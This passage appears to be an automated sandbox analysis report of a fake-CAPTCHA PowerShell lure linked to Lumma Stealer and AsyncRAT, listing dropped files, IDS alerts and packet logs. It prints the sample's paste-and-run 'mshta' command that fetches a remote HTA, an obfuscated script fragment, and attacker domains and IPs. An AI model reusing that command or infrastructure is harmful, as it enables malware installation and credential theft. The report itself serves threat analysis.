Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\recaptcha-verify[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	31911
Entropy (8bit):	6.7549335931824395
Encrypted:	false
SSDEEP:	768:Sbspoo/iiX2xPYqDKPbrDPeyacIk6hhVfb:S43/iiXpqDKCVnhhBb
MD5:	D91B5DE3C5C867DB8A2EC4569AE55D5C
SHA1:	B9CCDC1E0E8F124183A96AC6FD9025B698D08865
SHA-256:	F55BA11EEB1D1D2784304DC96361A81701318F0864497950A28CABD1F8B51108
SHA-512:	791FB337257F84C26A8D5424A5886183A477517889921C3309A8231063A2B67575B7D8A27DF2009107D8A149EAF5B67A427C41C5856EA8FE192740B70B05A58B
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>var _0x2455=["\x64\x6F\x63\x75\x6D\x65\x6E\x74\x4D\x6F\x64\x65","\x61\x6C\x6C"];l1l= document[_0x2455[0]]\|\| document[_0x2455[1]];var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');c6efa\|=lII;zLP=location.protocol+'0FD';x3UIcOiX8Zj='e7WgO75waI76';</script><script>xwq474P=new Array();xwq474P[0]='%63%38A%32oS\111b%35\166\155%36';c7hMs5q=new Array();c7hMs5q[0]='.\r.\n.<.h.t.m.l. .x~..n.s.=."~..t.p.:././.w~....w.3...o.r.g./.1.9~../.x~.~..".>~zd~..e.a.d.>.<

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oo2103v.evg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ptbh12j.1nj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qkvinzt.lrc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2sqyo1k.d3x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvqm5jz4.mnx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osfuljsb.n55.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxsjubho.qq2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uc2khghg.lt3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07YRWZ4ZQUJVU9E1UCR9.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7085525868578464
Encrypted:	false
SSDEEP:	48:hixFihCgZbU2K+yYukvhkvklCywWn2fqQJXlziSogZo1/qQJXl/iSogZox1:8whCPoikvhkvCCtxfJXxHefJXlHi
MD5:	8C02D0D813317F0E5E2D6CA3F827CB4C
SHA1:	B6288BE32767C807F91D8CC9A8F41D10FF249B81
SHA-256:	340CC4E4A33584080F9507E4990F3253DF5A0C8B328DB1818CFEA0FD649DC10F
SHA-512:	C5583AA19FBFAC5D406782F356FAB1684D22119FB6B1DF124F63D60F4BAA9887EC6B3835DD22AF54750A1AFAB82A9F8ECEB22E5007F31008FEB12C94F79B9C63
Malicious:	false
Preview:	...................................FL..................F.".. ...d........U.-g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......".-g..>._.-g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z.I....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.I..Roaming.@......DWSl/Z.I....C......................B..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Z.I....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl/Z.I....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Z.I....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Z.I....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z!I....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7085525868578464
Encrypted:	false
SSDEEP:	48:hixFihCgZbU2K+yYukvhkvklCywWn2fqQJXlziSogZo1/qQJXl/iSogZox1:8whCPoikvhkvCCtxfJXxHefJXlHi
MD5:	8C02D0D813317F0E5E2D6CA3F827CB4C
SHA1:	B6288BE32767C807F91D8CC9A8F41D10FF249B81
SHA-256:	340CC4E4A33584080F9507E4990F3253DF5A0C8B328DB1818CFEA0FD649DC10F
SHA-512:	C5583AA19FBFAC5D406782F356FAB1684D22119FB6B1DF124F63D60F4BAA9887EC6B3835DD22AF54750A1AFAB82A9F8ECEB22E5007F31008FEB12C94F79B9C63
Malicious:	false
Preview:	...................................FL..................F.".. ...d........U.-g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......".-g..>._.-g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z.I....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.I..Roaming.@......DWSl/Z.I....C......................B..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Z.I....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl/Z.I....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Z.I....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Z.I....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z!I....q...........

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	Unicode text, UTF-8 text, with no line terminators
Entropy (8bit):	4.842251469033845
TrID:
File name:	00.ps1
File size:	113 bytes
MD5:	8067bbe2706cbd02f6885c17c186e6cd
SHA1:	2d8e307684b8b5f8a8a68d5892db6879eaa69b25
SHA256:	44be296b2cbb2b21f81aa170020314425962a7e935678fbab1f4845e953aeecb
SHA512:	e524709437749c9a6f6d35b256712f56fa90892dbc26bacaebb85985341cefeb55539661be2fa4a6a25683128962b7b0b19b6a740fe9631ee12d8cc7f09951c5
SSDEEP:	3:rN6eX7XsFMXWIWjDXbgG+RbqRF4I1yMQRWLBCn:Z6eXQaPq3gTIMPyBCn
TLSH:	50B022B20C0020222F23002C02002B88033C8288A0F00023222200300033CB0C323008
File Content Preview:	mshta https://view-reserve.com/recaptcha-verify.html # ... ''I am not a robot - reCAPTCHA Verification ID: 7848''

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T10:09:11.832910+0100	2059221	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat)	1	192.168.2.5	50383	1.1.1.1	53	UDP
2025-01-15T10:09:11.848853+0100	2059189	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)	1	192.168.2.5	57853	1.1.1.1	53	UDP
2025-01-15T10:09:11.867321+0100	2059211	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)	1	192.168.2.5	56734	1.1.1.1	53	UDP
2025-01-15T10:09:11.887607+0100	2059201	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)	1	192.168.2.5	64755	1.1.1.1	53	UDP
2025-01-15T10:09:11.898821+0100	2059203	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)	1	192.168.2.5	57974	1.1.1.1	53	UDP
2025-01-15T10:09:11.913322+0100	2059199	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)	1	192.168.2.5	63101	1.1.1.1	53	UDP
2025-01-15T10:09:11.932328+0100	2059207	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)	1	192.168.2.5	58720	1.1.1.1	53	UDP
2025-01-15T10:09:11.948087+0100	2059209	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)	1	192.168.2.5	64529	1.1.1.1	53	UDP
2025-01-15T10:09:11.980268+0100	2059191	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)	1	192.168.2.5	58090	1.1.1.1	53	UDP
2025-01-15T10:09:12.652233+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	104.102.49.254	443	TCP
2025-01-15T10:09:13.234585+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49711	104.102.49.254	443	TCP
2025-01-15T10:09:18.345633+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	92.255.57.112	56001	192.168.2.5	49714	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 10:09:04.785295963 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:04.785343885 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:04.785417080 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:04.795753002 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:04.795772076 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:05.744620085 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:05.744719028 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:05.801297903 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:05.801342010 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:05.801646948 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:05.801707029 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:05.804436922 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:05.847333908 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.147650003 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.147682905 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.147702932 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.147737980 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:06.147778988 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:06.147790909 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.147838116 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:06.149449110 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.149497986 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.149528980 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:06.149544954 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:06.149601936 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:06.151467085 CET	49704	443	192.168.2.5	92.255.57.120
Jan 15, 2025 10:09:06.151482105 CET	443	49704	92.255.57.120	192.168.2.5
Jan 15, 2025 10:09:09.300981998 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.306040049 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:09.306163073 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.307121992 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.311892033 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:09.326205969 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.331150055 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:09.331341028 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.331552982 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.336302042 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:09.346779108 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.351639986 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:09.351928949 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.351928949 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:09.356801033 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015784025 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015805006 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015830994 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015842915 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015856028 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015868902 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015883923 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015885115 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.015901089 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015925884 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015929937 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.015942097 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.015947104 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.016020060 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.018574953 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018635988 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018649101 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018661976 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018681049 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018695116 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018726110 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.018726110 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.018749952 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018764973 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018779039 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018791914 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.018802881 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.018802881 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.018940926 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.020905972 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.020920038 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.020934105 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.020946980 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.021014929 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.021014929 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.021097898 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.023636103 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.023665905 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.023678064 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.023747921 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.062393904 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062422037 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062433958 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062452078 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062463999 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062475920 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062489033 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062490940 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.062500000 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062511921 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062526941 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.062547922 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.062547922 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.063340902 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.067409992 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.067423105 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.067435980 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.067462921 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.110129118 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.136795998 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136814117 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136826038 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136878967 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136897087 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136908054 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136919975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136915922 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.136931896 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.136992931 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.136993885 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.137031078 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.137700081 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137721062 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137815952 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.137856960 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137876987 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137887955 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137933016 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137945890 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137958050 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.137979031 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.137979031 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.138046980 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.138766050 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.138855934 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.138866901 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.138876915 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.138887882 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.138900995 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.138927937 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.139098883 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.139672041 CET	80	49707	92.255.57.112	192.168.2.5
